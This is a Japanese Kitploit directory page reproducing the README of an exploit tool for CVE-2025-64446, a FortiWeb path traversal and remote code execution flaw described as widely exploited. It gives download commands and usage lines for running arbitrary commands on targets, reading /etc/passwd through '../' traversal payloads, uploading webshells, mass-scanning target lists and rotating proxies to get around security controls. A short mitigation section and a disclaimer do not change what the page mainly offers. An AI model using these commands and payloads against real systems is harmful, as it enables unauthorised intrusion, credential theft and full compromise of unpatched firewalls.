Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-64446-fortiweb-exploit — CVE-2025-64446(FortiWeb パストラバーサル RCE 脆弱性)を検出・テストするためのセキュリティ調査ツール | Kitploit
ツール/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育ペイロード開発

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

CVE-2025-64446(FortiWeb パストラバーサル RCE 脆弱性)を検出・テストするためのセキュリティ調査ツール

リポジトリを見る
1119ヶ月前未レビュー

CVE-2025-64446 Fortinet FortiWeb パストラバーサル RCE エクスプロイト

Fortinet FortiWeb Webアプリケーションファイアウォール(WAF)におけるCVE-2025-64446脆弱性を検出およびテストするためのセキュリティ研究ツールです。この深刻なゼロデイパストラバーサル脆弱性は、実際に広く悪用されており、認証されていない攻撃者がセキュリティ制御をバイパスして任意のコードを実行することを可能にします。

⚠️ 免責事項

このツールは許可されたセキュリティテストおよび教育目的のみのためのものです。許可なくコンピュータシステムにアクセスすることは違法です。このツールは、自分が所有するシステム、またはテストする明示的な書面による許可があるシステムでのみ使用してください。

📋 概要

CVE-2025-64446 は、Fortinet FortiWeb WAF における深刻なゼロデイパストラバーサル脆弱性であり、実際に広く悪用されています。この脆弱性により、認証されていない攻撃者がパストラバーサル攻撃を通じてセキュリティ制御をバイパスし、リモートコード実行、設定ファイルへのアクセス、システム全体の侵害につながる可能性があります。

CVSS スコア: 9.8 (Critical)
ステータス: 広く悪用中
CISA KEV: 既知の悪用脆弱性カタログに追加
パッチ: FG-IR-25-910
影響を受ける製品: Fortinet FortiWeb WAF

🔍 機能

  • 自動 FortiWeb 検出: FortiWeb WAF の導入を特定します
  • パストラバーサルテスト: 複数のパストラバーサルペイロードバリエーションをテストします
  • 脆弱性確認: CVE-2025-64446 脆弱性を検証します
  • 設定ファイルへのアクセス: FortiWeb 設定ファイルの読み取りを試みます
  • Webシェル展開: Webシェルアップロード機能を実証します
  • コマンド実行: 任意のコマンドを実行します(許可されたテスト用)
  • マルチスレッド対応: 複数のターゲットを並行してスキャンします
  • プロキシサポート: 追加のセキュリティ制限をバイパスします
  • JSON エクスポート: 詳細な結果をJSON形式で出力します
  • POC スクリプト付属: シンプルな概念実証デモンストレーション

📦 インストール

前提条件

  • Python 3.6 以上
  • pip(Python パッケージマネージャー)

クイックインストール

root@kitploit:~
# リポジトリをクローン
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# 依存関係をインストール
pip install -r requirements.txt

# スクリプトを実行可能にする(オプション)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

別の方法: 直接ダウンロード

root@kitploit:~
# スクリプトをダウンロード
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# 依存関係をインストール
pip install requests

🚀 使用方法

基本的な使い方

root@kitploit:~
# 単一ターゲット
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# カスタムコマンドの実行
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# ファイルから複数ターゲット
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# スレッドを使用して高速スキャン
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# デバッグ用の詳細出力
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

プロキシの使用

root@kitploit:~
# 単一プロキシ
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# ファイルから複数プロキシ
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

POC スクリプト

root@kitploit:~
# 基本 POC テスト
python3 cve_2025_64446_poc.py -u http://target.com

# 特定のファイルをテスト
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# 詳細出力
python3 cve_2025_64446_poc.py -u http://target.com -v

コマンドラインオプション

root@kitploit:~
-u, --url          ターゲットURL
-f, --file         ターゲットURLを含むファイル(1行に1つ)
-c, --command      実行するコマンド(デフォルト: id)
-t, --threads      スレッド数(デフォルト: 1)
-o, --output       出力ファイル(デフォルト: uknf_fortiweb_results.json)
-v, --verbose      詳細なログを有効にする
--proxy            プロキシURL(例: http://127.0.0.1:8080)
--proxy-list       プロキシURLを含むファイル(1行に1つ)

📊 出力

スクリプトは詳細な結果を含む JSON ファイルを生成します:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 仕組み

  1. 検出フェーズ: FortiWeb WAF の指標(ヘッダー、コンテンツ、エラーページ)をスキャンします
  2. 脆弱性テスト: 複数のパストラバーサルペイロードバリエーションをテストします
  3. パストラバーサルの確認: ファイルアクセスの成功を検証します
  4. 設定へのアクセス: FortiWeb 設定ファイルの読み取りを試みます
  5. エクスプロイト: 脆弱な場合、Webシェル展開によるRCE機能を実証します

🛡️ 緩和策

FortiWeb WAF を使用している場合:

  1. すぐにセキュリティアップデートを適用:

    root@kitploit:~
    # 現在のバージョンを確認
    show system status
    
    # 最新バージョンに更新
    execute upgrade <firmware-file>
    
    • 参照: FG-IR-25-910
  2. ネットワークセグメンテーション:

    • FortiWeb 管理インターフェースへのアクセスを制限
    • ネットワーク ACL を実装
    • 管理アクセスには VPN を使用
  3. 構成の強化:

    • 不要な機能を無効化
    • 厳格なアクセス制御を実装
    • 包括的なログと監視を有効化
  4. CISA 要件:

    • 連邦機関は7日以内にパッチを適用する必要あり
    • CISA KEV カタログの更新を監視

📚 参照情報

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • CISA KEV カタログ: CVE-2025-64446
  • Tenable ブログ: CVE-2025-64446 分析

📖 例

例1: 単一ターゲットスキャン

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

例2: 複数ターゲットと出力

root@kitploit:~
# ターゲットファイルを作成
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# スキャンを実行
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

例3: カスタムコマンド実行

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

例4: プロキシの使用

root@kitploit:~
# 単一プロキシ
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# ファイルから複数プロキシ
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

例5: POC テスト

root@kitploit:~
# 基本 POC
python3 cve_2025_64446_poc.py -u https://example.com

# 特定のファイルをテスト
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 貢献

貢献は歓迎します!プルリクエストをお気軽に送信してください。

  1. リポジトリをフォーク
  2. 機能ブランチを作成 (git checkout -b feature/AmazingFeature)
  3. 変更をコミット (git commit -m 'Add some AmazingFeature')
  4. ブランチにプッシュ (git push origin feature/AmazingFeature)
  5. プルリクエストを開く

🐛 問題

問題が発生した場合や提案がある場合は、GitHub で issue を開いてください。

📝 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細については LICENSE ファイルを参照してください。

⭐ スター履歴

このツールが役に立った場合は、GitHub でスターを付けることを検討してください!

⚖️ 法的情報

このツールは教育目的および許可されたセキュリティテストのために提供されています。著者は、このプログラムの誤用または損害について一切責任を負いません。ユーザーは、システムをテストする前に適切な許可を得ていることを確認する責任があります。

🙏 謝辞

  • 脆弱性の最初の報告者とセキュリティ研究者
  • 脆弱性開示を行った Fortinet PSIRT
  • KEV カタログを維持する CISA
  • 継続的な研究を行うセキュリティコミュニティ

💰 寄付

このツールが役に立ち、プロジェクトを支援したい場合:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

ご支援ありがとうございます! 🙏

ツールをダウンロード